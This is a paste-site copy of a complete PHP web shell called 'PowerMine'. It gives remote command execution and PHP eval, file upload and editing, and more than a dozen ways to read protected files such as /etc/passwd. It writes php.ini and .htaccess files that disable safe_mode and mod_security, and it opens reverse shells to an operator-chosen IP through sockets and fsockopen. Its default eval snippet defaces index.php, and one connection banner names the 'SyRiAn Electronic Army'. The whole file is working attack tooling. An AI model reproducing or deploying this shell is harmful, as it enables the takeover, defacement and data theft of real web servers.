
Simple shell php

Apr 12th, 2015
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  1. <?php
  3. $user = 'tonlogin';
  4. $pass = 'tonmotdepasse';
  5. $uselogin = 1;
  6. $sh3llColor = "green";
  8. # MySQL Info ---------
  9. $DBhost = "localhost";
  10. $DBuser = "root";
  11. $DBpass = "root";
  12. #---------------------
  13. session_start();
  14. error_reporting(0);
  15. set_magic_quotes_runtime(0);
  16. set_time_limit(0);
  17. ignore_user_abort(TRUE);
  18. ini_restore("safe_mode");
  19. ini_restore("open_basedir");
  20. ini_set('max_execution_time',0);
  21. ini_set('output_buffering',0);
  22. ini_set('safe_mode','Off');
  24. // Set Current Directory
  25. if(!$_POST && !$_SESSION['curDir']) {
  26. $dir = getcwd();
  27. $_SESSION['curDir'] = $dir;
  28. } else if(empty($_POST['curDir'])) {
  29. $dir = $_SESSION['curDir'];
  30. } else {
  31. $dir = filter($_POST['curDir']);
  32. $_SESSION['curDir'] = $dir;
  33. }
  34. // Set Dir Mode
  35. if($_GET['dir_mode']) {
  36. $dir_mode = $_GET['dir_mode'];
  37. $_SESSION['dir_mode'] = $dir_mode;
  38. } else {
  39. $dir_mode = $_SESSION['dir_mode'];
  40. }
  42. // Set Usable Command
  43. if($_POST['exe_method']) {
  44. $exec_method = $_POST['exe_method'];
  45. } else {
  46. $exec_method = "exec";
  47. }
  48. # Logout
  49. if($_POST['logout']) {
  50. print '<script>document.cookie="user=;";document.cookie="pass=;";</script>';
  51. print '<script>document.location = "'.$_SERVER['PHP_SELF'].'";</script>';
  52. }
  53. if(strlen($dir)>1 && $dir[1]==":"){$os = "Windows";}else {$os = "Linux";}
  54. if($_GET['info']){phpinfo();}
  55. $safeMode = SafeMode();
  56. $server = substr($SERVER_SOFTWARE,0,120);
  57. $daemon = "";
  58. ?>
  59. <html>
  60. <head>
  61. <title>Pow3rMine</title>
  62. <link rel="shortcut icon" href='' />
  63. <meta http-equiv=Content-Type content=text/html; charset=UTF-8>
  64. <embed src="" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
  65. <?php echo CSS($sh3llColor); ?>
  67. </head>
  68. <body dir='ltr'>
  69. <?php
  70. # ---------------------------------------#
  71. # Authentication #
  72. #----------------------------------------#
  73. if ($uselogin ==1) {
  74. if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass)) {
  75. if($_GET) {$user = $_GET['user'];$pass = $_GET['pass'];}
  76. if($_POST['usrname']==$user && $_POST['passwrd']==$pass){
  77. print'<script>document.cookie="user='.$_POST['usrname'].';";document.cookie="pass='.md5($_POST['passwrd']).';";</script>';
  78. } else {
  79. if($_POST['usrname']){
  80. print'<script>alert("Nike ta mère ffddddpppp");</script>';
  81. }
  82. ?>
  83. <br><br>
  84. <center><img src=""><br />
  85. <sy>Pow3rMine</sy>
  86. </center><br />
  87. <div align="center">
  88. <form method="POST" name="login_form" onSubmit="if(this.usrname.value==''){return false;}">
  89. <input dir="ltr" name="usrname" id="username" value="" type="text" size="30" onBlur="Blur('username','userName');" onClick="Clear('username','userName');"/><br>
  90. <input dir="ltr" name="passwrd" id="password" value="" type="password" size="30" onFocus="Focus(2);" /><br>
  91. <input type="submit" value=" Login " name="login" />
  92. </form>
  93. </div>
  94. <?php
  95. footer();
  96. exit;
  97. }
  98. }
  99. }
  100. ?>
  101. <table cellpadding='0' cellspacing='0' width='100%'>
  102. <tr>
  103. <td width='160'>
  104. <center><form method="post"><input type="submit" value="Logout" name="logout" id="logout" /></form></center>
  105. <a href="<?php echo $_SERVER['PHP_SELF']; ?>"><img border='0' src='' width='100%' height='100%'></a><br>
  106. <center>PowerMine™
  107. <p></p>
  108. <select name="dir_mode" id="dir_mode" onchange="change_dir_mode();">
  109. <option value="cmd" <?php if($dir_mode == "cmd") {echo "selected";} ?> >CMD</option>
  110. <option value="php" <?php if($dir_mode == "php") {echo "selected";} ?>>PHP</option>
  111. </select>
  112. </center>
  113. </td>
  114. <td>
  115. <form method="post">
  116. <table width='100%' style="border:none; padding:2px;" >
  117. <tr>
  118. <td width='103'>System</td>
  119. <td width="323"><?php echo $os; ?></td>
  120. <td width="90">Apache Modules</td>
  121. <td width="278"><select ><?php
  122. if(function_exists("apache_get_modules")) {
  123. foreach (apache_get_modules() as $module) {
  124. echo "<option>".$module."</option>";
  125. }
  126. }else {
  127. echo "<option>NONE</option>";
  128. }
  129. ?></select></td>
  130. </tr>
  131. <tr>
  132. <td>uname </td>
  133. <td><a href='<?php echo php_uname(); ?>' target='_blank'><u><?php echo php_uname(); ?></u></a></td>
  134. <td>Curl</td>
  135. <td><?php echo Curl(); ?></td>
  136. </tr>
  137. <tr>
  138. <td>pwd</td>
  139. <td><?php echo getcwd(); ?></td>
  140. <td>Open Basedir</td>
  141. <td><?php echo openBaseDir(); ?></td>
  142. </tr>
  143. <tr>
  144. <td>whoami</td>
  145. <td><?php echo get_current_user(); ?></td>
  146. <td>Magic_Quotes</td>
  147. <td><?php echo magicQouts(); ?></td>
  148. </tr>
  149. <tr>
  150. <td>Server</td>
  151. <td><?php echo $server; ?></td>
  152. <td>Register Globals</td>
  153. <td><?php echo RegisterGlobals(); ?></td>
  154. </tr>
  155. <tr>
  156. <td>Server Name</td>
  157. <td><?php echo $_SERVER['HTTP_HOST']; ?></td>
  158. <td>Gzip</td>
  159. <td><?php echo Gzip(); ?></td>
  160. </tr>
  161. <tr>
  162. <td>Your IP</td>
  163. <td><?php echo GetRealIP(); ?></td>
  164. <td>Oracle</td>
  165. <td><?php echo Oracle(); ?></td>
  166. </tr>
  167. <tr>
  168. <td>Server IP</td>
  169. <td><a href='<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>&go=&form=QBLH&filt=all' target='_blank'><u><?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?></u></a> [<a href="<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>" target='_blank' />Reverse IP]</td>
  170. <td>MSQL</td>
  171. <td><?php echo MSQL(); ?></td>
  172. </tr>
  173. <tr>
  174. <td>PHP Version</td>
  175. <td><a href='javascript:openPHPInfo();'><u><?php echo phpversion(); ?></u></a></td>
  176. <td>MySQL</td>
  177. <td><?php echo MySQL2()." ".mysql_get_server_info(); ?></td>
  178. </tr>
  179. <tr>
  180. <td>Safe Mode</td>
  181. <td><?php echo $safeMode; ?></td>
  182. <td>MySQLi</td>
  183. <td><?php echo MysqlI(); ?></td>
  184. </tr>
  185. <tr>
  186. <td>disable functions</td>
  187. <td><select name="disableFunctions"><?php
  188. $funArray = DisableFunctions();
  189. $funArray = explode(",",$funArray);
  190. sort($funArray);
  191. foreach($funArray as $fun){echo "<option value='".$fun."'>".$fun."</option>";}
  192. ?></select>
  193. <input name="STOP_Execute" type="submit" id="STOP_Execute" value="Turn Off" />
  194. </td>
  195. <td>MsSQL</td>
  196. <td><?php echo MsSQL(); ?></td>
  197. </tr>
  198. </table>
  199. &nbsp; [<a href='' target='_blank'>MD5 Cracker</a>]
  200. [<a href='' target='_blank'>SHA1 Cracker</a>]
  201. [<a href='' target='_blank'>NTLM Cracker</a>]
  203. <input name="USERS_1" type="submit" id="USERS_1" value="Users [1]" />
  204. <input name="USERS_2" type="submit" id="USERS_2" value="Users [2]" />
  205. <input name="USERS_3" type="submit" id="USERS_3" value="Users [3]" />
  206. <input name="USERS_4" type="submit" id="USERS_4" value="Users [4]" />
  207. <input name="USERS_5" type="submit" id="USERS_5" value="Users [5]" />
  208. <input type="submit" name="forbidden_bypass" id="forbidden_bypass" value="Forbidden" />
  209. <input type="submit" name="find_755" id="find_755" value="Find 755" />
  210. <br>
  211. </form>
  212. </table>
  214. <form method="post">
  215. <center>
  216. <textarea cols="150" rows="20" name="result" >
  217. <?php
  218. chdir($dir);
  219. if($_POST['login'] || !$_POST){echo ScanDirs();}
  220. else if($_POST['CMD_Execute']){if(empty($_POST['CMD_Line'])){echo scanDirs();}else {Exe(urldecode(filter($_POST['CMD_Line']))); }}
  221. else if($_POST['PHP_Execute']){$eval = Evaluation(urldecode(filter($_POST['PHP_Line'])));}
  222. else if($_POST['UPLOAD_Execute']) {
  223. for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++) {
  224. if($_FILES['uploadfile']['name'][$i] != '') {
  225. if(function_exists('copy')){$upload = copy($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
  226. else{$upload = move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
  227. if($upload) {echo "The File ".$_FILES['uploadfile']['name'][$i]." Uploaded Successfully !
  228. "; }
  229. else { echo "The File ".$_FILES['uploadfile']['name'][$i]." Can't Be Upload :( !
  230. ";}
  231. }
  232. }
  233. }
  234. else if($_POST['EDIT_Execute']){$content = htmlspecialchars(file_get_contents(filter($_POST['Edit_Line'])));echo $content;}
  235. else if($_POST['SAVE_Execute']) {
  236. $content = filter($_POST['result']);
  237. if(empty($content)){$content = " ";}
  238. if(GenerateFile($_POST['FILE_NAME'],$content)){echo "[+]Saved Success !! ";}else{echo "[-]Save Failed !";}
  239. }
  240. else if($_POST['READ_Execute']) {
  241. $path = urldecode(filter($_POST['READ_Line']));
  242. $file = fopen($path,'r+');
  243. if($_POST['READ_Type'] == "file"){echo htmlspecialchars(filter(FileF($path))); }
  244. else if($_POST['READ_Type'] == "fgets"){while(($line = htmlspecialchars(filter(fgets($file)))) != false){echo $line;}}
  245. else if($_POST['READ_Type'] == "fgetss"){while(($line = htmlspecialchars(filter(fgetss($file)))) != false){echo $line;}}
  246. else if($_POST['READ_Type'] == "readfile"){echo htmlspecialchars(filter(readfile($path)));}
  247. else if($_POST['READ_Type'] == "fread"){echo htmlspecialchars(filter(fread($file,filesize($path))));}
  248. else if($_POST['READ_Type'] == "file_get_contents"){echo htmlspecialchars(filter(file_get_contents($path)));}
  249. else if($_POST['READ_Type'] == "tempnam"){echo htmlspecialchars(filter(TempnameF($path)));}
  250. else if($_POST['READ_Type'] == "copy"){echo htmlspecialchars(filter(CopyF($path)));}
  251. else if($_POST['READ_Type'] == "mb_send_mail"){echo htmlspecialchars(filter(mbSendEmail($path)));}
  252. else if($_POST['READ_Type'] == "highlight_file"){echo htmlspecialchars(filter(highlightFile($path)));}
  253. else if($_POST['READ_Type'] == "curl"){echo htmlspecialchars(filter(CurlFileRead($path)));}
  254. else if($_POST['READ_Type'] == "imap"){echo htmlspecialchars(filter(ImapF($path)));}
  255. else if($_POST['READ_Type'] == "id"){echo htmlspecialchars(filter(ReadId($path)));}
  256. else if($_POST['READ_Type'] == "show_source"){echo htmlspecialchars(filter(show_source($path)));}
  257. else if($_POST['READ_Type'] == "mysql"){echo htmlspecialchars(filter(MySQLReader($path)));}
  258. else if($_POST['READ_Type'] == "mysqli"){echo htmlspecialchars(filter(MySQLIReader($path)));}
  259. else if($_POST['READ_Type'] == "symlink"){echo htmlspecialchars(filter(SymlinkF($path)));}
  260. else if($_POST['READ_Type'] == "ioncube"){echo htmlspecialchars(filter(ioncube_read_file($path)));}
  261. else if($_POST['READ_Type'] == "error_log"){echo htmlspecialchars(filter(ErrorLog($path)));}
  262. else if($_POST['READ_Type'] == "include"){echo htmlspecialchars(filter(IncludeReader($path)));}
  263. }
  264. else if($_POST['STOP_Execute']) {
  265. $genTry = GenerateFile("php.ini","
  266. safe_mode = Off
  267. disable_functions = NONE
  268. safe_mode_gid = OFF
  269. open_basedir = OFF");
  270. if($genTry){echo "[+] php.ini Has Been Generated Successfully
  271. ";}
  272. else {echo "[-] Failed to generate php.ini file !!
  273. ";}
  275. $genTry = GenerateFile(".htaccess","
  276. <IfModule mod_security.c>
  277. SecFilterEngine Off
  278. SecFilterScanPOST Off
  279. SecFilterCheckURLEncoding Off
  280. SecFilterCheckCookieFormat Off
  281. SecFilterCheckUnicodeEncoding Off
  282. SecFilterNormalizeCookies Off
  283. </IfModule>
  284. <Limit GET POST>
  285. order deny,allow
  286. deny from all
  287. allow from all
  288. </Limit>
  289. <Limit PUT DELETE>
  290. order deny,allow
  291. deny from all
  292. </Limit>
  293. SetEnv PHPRC ".getcwd()."/php.ini
  294. ");
  295. if($genTry){echo "[+] .htaccess Has Been Generated Successfully
  296. ";}
  297. else {echo "[-] Failed to generate .htaccess file !!
  298. ";}
  299. }
  300. else if($_POST['CON_Type'] == "socks") {
  301. $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  302. if($sock < 0){echo "[-] failed to create socket.";}
  303. else {
  304. $result = socket_connect($sock, filter(trim($_POST['ip'])), filter(trim($_POST['port'])));
  305. if($result < 0){echo "[-] failed to connect back to host:".$_GET['host'];}
  306. else {
  307. $send_var = "\n\n -== PowerMine , Back Connection ==-\n$";
  308. socket_write($sock, $send_var, strlen($send_var));
  309. while($input = socket_read($sock, 10000)) {
  310. socket_write($sock, shell_exec($input), 12000);
  311. }
  312. }
  313. }
  314. } else if($_POST['CON_Type'] == "fsockopen") {
  315. $ip = filter(trim($_POST['ip']));
  316. $port = filter(trim($_POST['port']));
  317. if (!empty($ip)) {
  318. $con_fsockopen = fsockopen($ip , $port , $errno, $errstr );
  319. if (!$con_fsockopen){
  320. $result = "Error: didnt connect !!!";
  321. } else {
  322. $newLine="\n";
  323. fputs ($con_fsockopen ,"\n\n -== SyRiAn Electronic Army , Back Connection ==-\n$");
  324. fputs($con_fsockopen , system("uname -a") .$newLine );
  325. fputs($con_fsockopen , system("pwd") .$newLine );
  326. fputs($con_fsockopen , system("id") .$newLine.$newLine );
  327. while(!feof($con_fsockopen)){
  328. fputs ($con_fsockopen);
  329. $one="[$";
  330. $two="]";
  331. $result= fgets ($con_fsockopen, 8192);
  332. $message = $result;
  333. fputs ($con_fsockopen, $one. system("whoami") .$two. " " .$message."\n");
  334. }
  335. fclose ($con_fsockopen);
  336. }
  337. }
  338. }
  339. else if($_POST['USERS_1']){echo GetUsers1();}
  340. else if($_POST['USERS_2']) {
  341. $array = GetUsers2();
  342. foreach($array as $line)
  343. {echo $line."
  344. ";}
  345. }
  346. else if($_POST['USERS_3']) {
  347. $array = GetUsers3();
  348. foreach($array as $line)
  349. {echo $line."
  350. ";}
  351. }
  352. else if($_POST['USERS_4']) {
  353. $array = GetUsers4();
  354. foreach($array as $line)
  355. {echo $line."
  356. ";}
  357. } else if($_POST['USERS_5']){echo GetUsers5();}
  358. else if($_POST['forbidden_bypass']) {
  359. mkdir("forbidden");
  360. chdir("forbidden");
  361. $forbidden_htaccess = GenerateFile(".htaccess", "
  362. DirectoryIndex sea.txt
  363. HeaderName sea.txt
  364. ReadmeName sea.txt
  365. footerName sea.txt
  366. ErrorDocument 404 /404.html
  367. 404.html = Symlinked sea.txt
  368. Options all
  369. ForceType text/plain
  370. AddType text/plain .php
  371. AddType text/plain .html
  372. AddHandler server-parsed .php
  373. AddHandler txt .php
  374. ");
  375. if($forbidden_htaccess) {
  376. echo "[+] make your symlink as sea.txt in /forbidden/ folder and find the url /forbidden/sea.txt or /forbidden/";
  377. } else {
  378. echo "[-] error with generating .htaccess file.";
  379. }
  380. } else if($_POST['find_755']) {
  381. Exe("ls -dl /home/*/public_html/ | grep drwxr-xr-x");
  382. }
  383. ?></textarea>
  384. <?php
  385. if($_POST['EDIT_Execute']){echo "<input type='submit' value='Save' name='SAVE_Execute' class='Save' />
  386. <input type='hidden' name='FILE_NAME' value='".$_POST['Edit_Line']."' />
  387. ";}
  388. ?>
  389. </center></form>
  390. <table width='100%'>
  391. <tr valign="top">
  392. <td width='30%'>
  393. <!-- Command Line -->
  394. <form method='POST' enctype="multipart/form-data">
  395. <table height='72' border='0' id='Box' width="100%">
  396. <tr>
  397. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  398. <td style="background-color:#666;padding-left:10px;">Edit File
  399. <input name="EDIT_Execute" type="submit" id="EDIT_Execute" value="Edit" /></td>
  400. </tr>
  401. <tr>
  402. <td height="45" colspan="2"><input type='text' name='Edit_Line' id='Edit_Line' value='<?php if($_POST['EDIT_Execute']){echo filter($_POST['Edit_Line']);}else {echo $dir;} ?>' size="70"></td>
  403. </tr>
  404. </table>
  405. </form>
  406. <!-- End Of Command Line-->
  408. </td>
  409. <td width='30%' height='30'>
  410. <!-- Command Line -->
  411. <form method='POST' enctype="multipart/form-data">
  412. <table height='72' border='0' id='Box'>
  413. <tr>
  414. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  415. <td style="background-color:#666;padding-left:10px;">Command Line
  416. <?php echo print_exe_method(); ?>
  417. <input name="CMD_Execute" type="submit" id="CMD_Execute" value="Execute" onClick="document.getElementById('CMD_Line').value = encodeURIComponent(document.getElementById('CMD_Line').value);">
  418. </td>
  419. </tr>
  420. <tr>
  421. <td height="45" colspan="2">
  422. <?php echo SelectCommand($os); ?>
  423. <input type='text' name='CMD_Line' id='CMD_Line' value='' size="70">
  424. <input name="curDir" type="text" id="curDir" value="<?php if($_POST['Execute']){echo $_POST['curDir'];} else {echo getcwd();} ?>" size="70"></td>
  425. </tr>
  426. </table>
  427. </form>
  428. <!-- End Of Command Line-->
  429. </td>
  430. <td width='30%' height='30' valign="top">
  431. <!-- Commands Alias-->
  432. <form method='POST' enctype="multipart/form-data">
  433. <table width='100%' height='72' border='0' id='Box'>
  434. <tr>
  435. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  436. <td style="background-color:#666;padding-left:10px;">Upload Files <span style="padding-left:10px;">
  437. <input type='button' value='+' id='addUpload' size='5' onclick='addUploadInput();'>
  438. <input name='UPLOAD_Execute' type='submit' id="UPLOAD_Execute" value='Upload Files'>
  439. </span></td>
  440. </tr>
  441. <tr>
  442. <td height="45" colspan="2">
  443. <input type='file' name='uploadfile[]'>
  444. <input type='file' name='uploadfile[]'><div id='uploadInput'></div></td>
  445. </tr>
  446. </table>
  447. </form>
  448. <!-- End Of Commands Alias-->
  449. </td>
  450. </tr>
  451. <tr valign="top">
  452. <td width='30%'>
  453. <!-- Commands Alias-->
  454. <form method='POST' enctype="multipart/form-data">
  455. <table width='100%' height='72' border='0' id='Box'>
  456. <tr>
  457. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  458. <td style="background-color:#666;padding-left:10px;">PHP Eval
  459. <input name="PHP_Execute" type="submit" id="PHP_Execute" onClick="document.getElementById('PHP_Line').value = encodeURIComponent(document.getElementById('PHP_Line').value);" value="Evaluate"></td>
  460. </tr>
  461. <tr>
  462. <td height="45" colspan="2"><label for="PHP_Line"></label>
  463. <textarea name="PHP_Line" id="PHP_Line" cols="50" rows="2"><?php if($_POST['PHP_Execute']){echo urldecode(filter($_POST['PHP_Line']));}else {echo '$file = fopen("index.php","w+");
  464. fwrite($file,"Hacked");
  465. fclose($file);';}
  466. ?>
  467. </textarea>
  468. <br></td>
  469. </tr>
  470. </table>
  471. </form>
  472. <!-- End Of Commands Alias-->
  473. </td>
  474. <td width='30%' height='30'>
  475. <!-- Commands Alias-->
  476. <form method='POST' enctype="multipart/form-data">
  477. <table width='100%' height='72' border='0' id='Box'>
  478. <tr>
  479. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  480. <td style="background-color:#666;padding-left:10px;">Read Files
  482. <select name="READ_Type" >
  483. <option value="file" >file</option>
  484. <option value="fgets" >fgets</option>
  485. <option value="fgetss" >fgetss</option>
  486. <option value="readfile" >readfile</option>
  487. <option value="fread" >fread</option>
  488. <option value="show_source" >show_source</option>
  489. <option value="file_get_contents" >file_get_contents</option>
  490. <option value="tempnam" >tempnam</option>
  491. <option value="copy" >copy</option>
  492. <option value="symlink" >Symlink</option>
  493. <option value="mb_send_mail" >mb_send_mail</option>
  494. <option value="highlight_file" >highlight_file</option>
  495. <option value="curl" >Curl</option>
  496. <option value="imap" >Imap</option>
  497. <option value="mysql" >MySQL</option>
  498. <option value="mysqli" >MySQLI</option>
  499. <option value="ioncube">Ion Cube</option>
  500. <option value="error_log">Error_Log</option>
  501. <option value="include">Include</option>
  502. <option value="id" >ID /etc/passwd</option>
  503. </select>
  504. <input name="READ_Execute" type="submit" id="READ_Execute" onClick="document.getElementById('READ_Line').value = encodeURIComponent(document.getElementById('READ_Line').value);" value="Read"></td>
  505. </tr>
  506. <tr>
  507. <td height="45" colspan="2"><input type='text' name='READ_Line' id='READ_Line' value='<?php if($_POST['READ_Execute']){echo urldecode(filter($_POST['READ_Line']));}else {echo $dir;} ?>' size="70"></td>
  508. </tr>
  509. </table>
  510. </form>
  511. <!-- End Of Commands Alias-->
  512. </td>
  513. <td width='30%' height='30' valign="top">
  514. <!-- Commands Alias-->
  515. <form method='POST' enctype="multipart/form-data">
  516. <table width='100%' height='72' border='0' id='Box'>
  517. <tr>
  518. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  519. <td style="background-color:#666;padding-left:10px;">Back Connection
  520. <input name='CON_Execute' type='submit' id="CON_Execute" value='Connect'></td>
  521. </tr>
  522. <tr>
  523. <td height="45" colspan="2"><input type="text" name="ip" value="<?php if($_POST['CON_Execute']){echo $_POST['ip']; }else {echo GetRealIP(); } ?>" />
  524. <input type="text" name="port" value="<?php if($_POST['CON_Execute']){echo $_POST['port']; }else {echo "443"; } ?>" />
  525. <select name="CON_Type" >
  526. <option value="socks">SOCKS</option>
  527. <option value="fsockopen">FSOCKOPEN</option>
  528. </select>
  529. </td>
  530. </tr>
  531. </table>
  532. </form>
  533. <!-- End Of Commands Alias-->
  534. </td>
  535. </tr>
  536. </table>
  537. <?php
  538. function IncludeReader($path) {
  539. global $os;
  540. if($os == "Windows"){$slash = "\\";}else{$slash = "/";}
  541. $fileName = substr(strrchr($path,$slash),1);
  542. $includePath = substr($path,0,strpos($path,$fileName,0));
  543. ini_set("include_path",$includePath);
  544. include($fileName);
  545. }
  546. function GetUsers1() {
  547. return Exe('ls /var/mail');
  548. }
  549. function GetUsers2() {
  550. $array = array();
  551. $lines = file("/etc/passwd");
  552. foreach($lines as $nr=>$val) {
  553. $str = explode(":",$val);
  554. array_push($array,$str[0]);
  555. }
  556. return $array;
  557. }
  558. function GetUsers3() {
  559. $array = array();
  560. if ($dh = opendir("/home/")) {
  561. while (($file = readdir($dh)) !== false) {
  562. array_push($array,$file);
  563. }
  564. closedir($dh);
  565. return $array;
  566. }
  567. }
  568. function GetUsers4() {
  569. $dir = "/home/";
  570. $array = array();
  571. if ($dh = opendir($dir)) {
  572. $f = readdir($dh);
  573. while (($f = readdir($dh)) !== false) {
  574. $dh2=opendir($dir."/");
  575. $f2 = readdir($dh2);
  576. while (($f2 = readdir($dh2)) !== false) {
  577. $f2.="/";
  578. $dh3=opendir($dir.$f.$f2);
  579. $f3 = readdir($dh3);
  580. while (($f3 = readdir($dh3)) !== false) {
  581. array_push($array,$f3);
  582. }
  583. }
  584. }
  585. closedir($dh);
  586. return $array;
  587. }
  588. }
  589. function GetUsers5(){
  590. return realpath('/etc/passwd');
  591. }
  592. function ErrorLog($path){
  593. $tempFile = uniqid();
  594. if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  595. error_log(file_get_contents($path), 3, $tempFile);
  596. $content = file_get_contents($tempFile);
  597. unlink($tempFile);
  598. return $content;
  599. }
  600. function SymlinkF($path) {
  601. $tempFile = uniqid();
  602. if(function_exists('symlink')) {
  603. symlink($path,$tempFile);
  604. $content = file_get_contents($tempFile);
  605. unlink($tempFile);
  606. return $content;
  607. }
  608. }
  609. function MySQLReader($path) {
  610. global $DBhost,$DBuser,$DBpass;
  611. if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  612. $con = mysql_connect($DBhost,$DBuser,$DBpass);
  613. mysql_query("CREATE DATABASE a");
  614. mysql_query("CREATE TABLE a.a (a varchar(1024))");
  615. mysql_query("GRANT SELECT,INSERT ON a.a TO '".$DBuser."'");
  616. mysql_query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a") or die(mysql_error());
  617. $result = mysql_query("SELECT a FROM a.a");
  618. while(list($row) = mysql_fetch_row($result)){print $row . chr(10);}
  619. mysql_query("DROP DATABASE a");
  620. }
  621. function MySQLIReader($path) {
  622. global $DBhost,$DBuser,$DBpass;
  623. if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  624. $con = mysql_connect($DBhost,$DBuser,$DBpass);
  625. mysql_query("CREATE DATABASE a");
  626. mysql_query("CREATE TABLE a.a (a varchar(1024))");
  628. function r($fp, &$buf, $len, &$err) {
  629. print fread($fp, $len);
  630. }
  631. $m = new mysqli($DBhost, $DBuser, $DBpass, 'a');
  632. $m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
  633. $m->set_local_infile_handler("r");
  634. $m->query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a");
  635. $m->close();
  636. }
  637. function DBConnect($host,$user,$pass,$db) {
  638. $connect = mysql_pconnect($host,$user,$pass);
  639. if(!$connect){echo "Can't Connect to [ ".$host." ] [ ".$user." ] [ ".$pass." ]"; return false; }
  640. else {
  641. $tryToSelectDB = mysql_select_db($db,$connect);
  642. if(!$tryToSelectDB){echo "Can't Enter The Database [ ".$db." ]"; return false; }
  643. else{return true; return $connect;}
  644. }
  645. }
  646. function ReadId($path) {
  647. for($uid=0;$uid<60000;$uid++) {
  648. $ara = posix_getpwuid($uid);
  649. if (!empty($ara)){while (list ($key, $val) = eah($ara)){$content .= $val;}
  650. }
  651. }
  652. return $content;
  653. }
  654. function ImapF($path) {
  655. $stream = imap_open($path, "", "");
  656. $str = imap_body($stream, 1);
  657. imap_close($stream);
  658. return $str;
  659. }
  660. function FileF($path) {
  661. $lines = file($path); foreach($lines as $line){$content .= $line;}
  662. return $content;
  663. }
  664. function CopyF($path) {
  665. $tempFile = md5(uniqid()).".bb";
  666. copy($path,$tempFile);
  667. $content = file_get_contents($tempFile);
  668. unlink($tempFile);
  669. return $content;
  670. }
  671. function fgetssF($path) {
  672. while(($line = fgetss($path)) != false){$content .= $line;}
  673. return $content;
  674. }
  675. function highlightFile($path) {
  676. return highlight_file($path);
  677. }
  678. function mbSendEmail($path) {
  679. if(function_exists('mb_send_mail')) {
  680. $tempFile = uniqid();
  681. $additional_param = "-C ".$path." -X ".getcwd()."/".$tempFile;
  682. mb_send_mail("", NULL, NULL, NULL, $additional_param);
  683. $content = file_get_contents($tempFile);
  684. unlink($tempFile);
  685. return $content;
  686. }
  687. }
  688. function DeleteFile($fileName) {
  689. global $os;
  690. if(function_exists('unlink'))
  691. {$delete = unlink($fileName);}
  692. if((!$delete) && ($os == 'Windows'))
  693. {$delete = Exe("del $fileName"); }
  694. else if((!$delete) && ($os == 'Linux'))
  695. {$delete = Exe("rm -f $fileName");}
  696. if($delete){return true;}else{return false;}
  697. }
  698. function CurlFileRead($path) {
  699. $ch = curl_init("file://".$path."\x00".__FILE__);
  700. var_dump(curl_exec($ch));
  701. }
  702. function FReadF($path) {
  703. $file = fopen($path,'r+'); //Open The File
  704. if(function_exists('fread')){htmlspecialchars(fread($file,filesize($file)));}
  705. fclose($file);
  706. }
  707. function TempnameF($path) {
  708. global $dir;
  709. $temp = tempnam($dir, "cx");
  710. if(copy("compress.zlib://".$path, $temp)) {
  711. $handler = fopen($temp, "r");
  712. $readFile = fread($handler, @filesize($temp));
  713. fclose($handler);
  714. $content .= htmlspecialchars($filename);
  715. $content .= nl2br(htmlspecialchars($readFile));
  716. $content .= htmlspecialchars($filename);
  717. unlink($temp);
  718. return $content;
  719. }
  720. }
  721. function Evaluation($eval) {
  722. $eval = str_replace(array("<?php","<?","?>"),"",$eval);
  723. $eval = eval($eval);
  724. if($eval){return true;}else{return false;}
  725. }
  726. function Oracle() {
  727. if(function_exists('ocilogon')){$oracle = '<font color="red">ON</font>';}
  728. else {$oracle = '<font color="green">OFF</font>';}return $oracle;
  729. }
  730. function MsSQL() {
  731. if(function_exists('mssql_connect')){$msSQL = '<font color="red">ON</font>';}
  732. else {$msSQL = '<font color="green">OFF</font>';}return $msSQL;
  733. }
  734. function MySQL2() {
  735. $mysql_try = function_exists('mysql_connect');
  736. if($mysql_try){$mysql = '<font color="red">ON</font>';}
  737. else {$mysql = '<font color="green">OFF</font>';}return $mysql;
  738. }
  739. function MSQL() {
  740. if (function_exists('msql_connect')){$mSql = '<font color="red">ON</font>';}
  741. else {$mSql = '<font color="green">OFF</font>';}return $mSql;
  742. }
  743. function MysqlI() {
  744. if (function_exists('mysqli_connect')){$mysqli = '<font color="red">ON</font>';}
  745. else {$mysqli = '<font color="green">OFF</font>';}return $mysqli;
  746. }
  747. function Gzip() {
  748. if (function_exists('gzencode')){$gzip = '<font color="red">ON</font>';}
  749. else {$gzip = '<font color="green">OFF</font>';}return $gzip;
  750. }
  751. function openBaseDir() {
  752. $openBaseDir = ini_get("open_basedir");
  753. if (!$openBaseDir){$openBaseDir = '<font color="green">OFF</font>';}
  754. else {$openBaseDir = '<font color="red">ON</font>';}
  755. return $openBaseDir;
  756. }
  757. function Curl() {
  758. if(extension_loaded('curl')){$curl = '<font color="red">ON</font>';}
  759. else{$curl = '<font color="green">OFF</font>';}return $curl;
  760. }
  761. function magicQouts() {
  762. if(function_exists('get_magic_quotes_gpc')){$mag = get_magic_quotes_gpc();}
  763. if (empty($mag)){$mag = '<font color="green">OFF</font>';}
  764. else {$mag= '<font color="red">ON</font>';}return $mag;
  765. }
  766. function SafeMode() {
  767. $safe_mode = ini_get("safe_mode");
  768. if (!$safe_mode){$safe_mode = '<font color="green">OFF</font>';}
  769. else {$safe_mode = '<font color="red">ON</font>';}
  770. return $safe_mode;
  771. }
  772. function DisableFunctions() {
  773. $disfun = ini_get('disable_functions');
  774. if (empty($disfun)){$disfun = '<font color="green">NONE</font>';}return $disfun;
  775. }
